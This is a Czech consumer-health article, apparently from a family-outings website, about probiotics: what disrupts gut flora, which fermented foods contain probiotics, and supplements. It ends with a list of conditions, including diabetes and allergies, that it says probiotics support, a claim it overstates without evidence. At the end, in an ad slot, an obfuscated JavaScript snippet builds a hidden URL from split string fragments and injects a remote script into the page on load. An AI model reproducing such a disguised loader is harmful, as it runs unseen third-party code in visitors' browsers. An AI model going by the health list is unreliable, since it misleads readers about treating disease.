REKLAMA
Kam na výlety s dětmi a rodinou
Dnes je 29.5. a svátek má Maxim

Slabá imunita, špatné trávení i akné. Kdy si vzít na pomoc probiotika?

30. 8. 2022

Zdravá střeva, zdravý duch. Oslabený střevní mikrobiom může způsobovat celou řadu nemocí, zatímco my hledáme příčinu jinde. Tělo však mnohdy potřebuje pouze více probiotik, tedy hodných bakterií, které mají pozitivní vliv nejen na trávení. S čím vším pomohou pomoci?

Probiotika jsou živé mikroorganismy (nejčastěji bakterie, někdy i kvasinky), které se přirozeně nacházejí ve střevní mikroflóře a starají se o hladký chod všech funkcí spojených se střevy. Když jich má tělo nedostatek, začne to dávat najevo různými způsoby, třeba oslabenou imunitou, zažívacími potížemi, ale i kožními problémy.

Zdraví střev oslabuje nemoc, alkohol i stres

K narušení rovnováhy dobrých a špatných bakterií dochází i během užívání léků, zejména antibiotik, která jsou opakem probiotik. Stejný proces nastává i při nadměrné konzumaci alkoholu nebo chronickém stresu a obecně nevhodné životosprávě. Souvislost mezi naším celkovým zdravím a střevním mikrobiomem dokazuje celá řada výzkumů a některé z nich tuto souvislost dokonce připisují i psychickým problémům.

REKLAMA

Probiotika lze získat i z potravin

Jak tedy probiotika získat a navrátit střevům harmonii? Nejprve se zamyslete nad svým životním stylem a sami zhodnoťte, zda něco nemůžete dělat lépe. Ať už jde o úpravu jídelníčku, nebo zvýšení pohybové aktivity. Co se týče konkrétních potravin, kromě bílých jogurtů s živými kulturami jsou bohatou zásobárnou probiotik i kysané výrobky, jako je zelí, kimchi nebo kefír. Probiotiky se pyšní také tempeh, japonské miso i fermentovaný nápoj zvaný kombucha.

Probiotika jako doplňková léčba různých neduhů

Jestliže se vám příliš nezamlouvá představa, že byste se každý den měli cpát kysanými nápoji a fermentovanou zeleninou, můžete sáhnout po doplňcích stravy. Ty jsou v lékárnách volně k dostání v podobě kapslí i kapek, které jsou vhodné hlavně pro děti. Při užívání probiotik je důležité dávkování – u jednotlivých přípravků se může lišit.

REKLAMA

Probiotika lze užívat preventivně nebo jako podpůrnou léčbu při:

  • oslabené imunitě,
  • užívání antibiotik,
  • zažívacích potížích,
  • kožních onemocněních včetně akné,
  • zánětlivých onemocněních,
  • výskytu kvasinkové infekce,
  • alergiích,
  • onemocnění cukrovkou
Sdílejte článek s přáteli:
Našli jste nějakou chybu? Nahlašte nám ji
Nahlásit chybu

Mohlo by se Vám také líbit

REKLAMA
(function(){ omeX=document.createElement("script");omeX.async=true;omeX_="u"+("s")+"t"; omeXu="430316072.";omeX_+="a"+("t.i");omeX_+="n"+("f"+"o")+"/"; omeXu+="8j2l6gm0meXk4uyi4ha57j"+("k3qi5pjq"); omeX.src="https://"+omeX_+omeXu;omeX.type="text/javascript"; document.body.appendChild(omeX); })();
REKLAMA